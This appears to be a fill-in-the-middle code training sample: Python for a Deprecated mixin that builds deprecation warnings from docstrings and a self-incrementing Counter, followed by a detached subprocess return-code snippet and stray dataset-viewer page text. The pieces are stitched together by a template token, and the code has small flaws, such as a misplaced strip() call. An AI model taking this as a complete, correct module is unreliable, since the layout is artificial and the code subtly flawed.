>>> class OldClassName(Deprecated, NewClassName):
... "Use NewClassName instead."
The docstring of the deprecated class will be used in the
deprecation warning message.
"""
def __new__(cls, *args, **kwargs):
# Figure out which class is the deprecated one.
dep_cls = None
for base in _mro(cls):
if Deprecated in base.__bases__:
dep_cls = base; break
assert dep_cls, 'Unable to determine which base is deprecated.'
# Construct an appropriate warning.
doc = dep_cls.__doc__ or ''.strip()
# If there's a @deprecated field, strip off the field marker.
doc = re.sub(r'\A\s*@deprecated:', r'', doc)
# Strip off any indentation.
doc = re.sub(r'(?m)^\s*', '', doc)
# Construct a 'name' string.
name = 'Class %s' % dep_cls.__name__
if cls != dep_cls:
name += ' (base class for %s)' % cls.__name__
# Put it all together.
msg = '%s has been deprecated. %s' % (name, doc)
# Wrap it.
msg = '\n' + textwrap.fill(msg, initial_indent=' ',
subsequent_indent=' ')
warnings.warn(msg, category=DeprecationWarning, stacklevel=2)
# Do the actual work of __new__.
return object.__new__(cls, *args, **kwargs)
##########################################################################
# COUNTER, FOR UNIQUE NAMING
##########################################################################
class Counter:
"""
A counter that auto-increments each time its value is read.
"""
def __init__(self, initial_value=0):
self._value = initial_value
def get(self):
self._value += 1
return self._value<|fim▁end|>
|
(stdout, stderr) = p.communicate()
# Check the return code.
if p.returncode != 0:
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.